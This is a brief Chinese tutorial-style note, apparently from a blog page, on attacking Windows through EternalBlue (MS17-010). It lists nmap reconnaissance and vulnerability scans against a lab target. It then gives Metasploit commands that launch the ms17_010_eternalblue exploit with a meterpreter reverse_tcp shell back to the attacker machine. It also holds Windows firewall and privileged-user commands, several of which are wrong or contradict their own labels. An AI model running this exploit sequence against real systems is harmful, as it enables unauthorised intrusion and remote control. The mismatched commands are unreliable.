永恒之蓝攻击

格式使用:wmic [系统参数名] list [brief或full] /format:hform >或>> [文件名]
3.通过 sc 工具管理服务,启动 mysql 服务:sc stop sysql
4.通过命令行 CMD 管理 Windows 防火墙,允许 192.168.1.100 连接所有端 口:netsh netsh advfirewall firewall add rule name=ming protocol=TCP localport=8080 dir=in action=allow remoteip=192.168.1.100
5.阻断 tcp/3389 端口连接:taskkill /f /pid3386 /t
6.通过命令行 CMD 管理 Windows 用户,添加 skill 用户至 administrators 组:
net user skill skill /ad
添加一条名为3386入站规则放行3386端口的策略: netsh advfirewall firewall add rule name=3389_test dir=in action=allow protocol=TCP localport=3389


nmap扫描;
nmap 192.168.117.150  扫描开发的端口
nmap --seript=vuln 192.168.117.150  ;扫描存在的漏洞  ————永恒之蓝的漏洞是smb-vuln-ms17-010
nmap -A 192.168.117.150 扫描目标的所有信息
nmap -p 445 192.168.117.150 扫描指定端口扫描
nmap -PA 192.168.117.0 /24 扫描局域网所有IP信息
nmap -sV -v 192.168.117.150 指纹识别扫描

msfconsole


use auxiliary/scanner/smb_ms17_010   -----扫描靶机的信息
set RHOST  靶机地址
run    --- 攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOST 靶机地址      
set LHOST 攻击机
set payload windows/X64/meterpreter/reverse_tcp
run

search ms17 查询漏洞编号”ms17“
"use 6"  
option ---查询必须的参数   


search ms17
use 8   -----使用8模块
show payloads   ------显示所有载荷模块
set payload 15 ------使用15的载荷模块
options  ------查询必填的内容

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值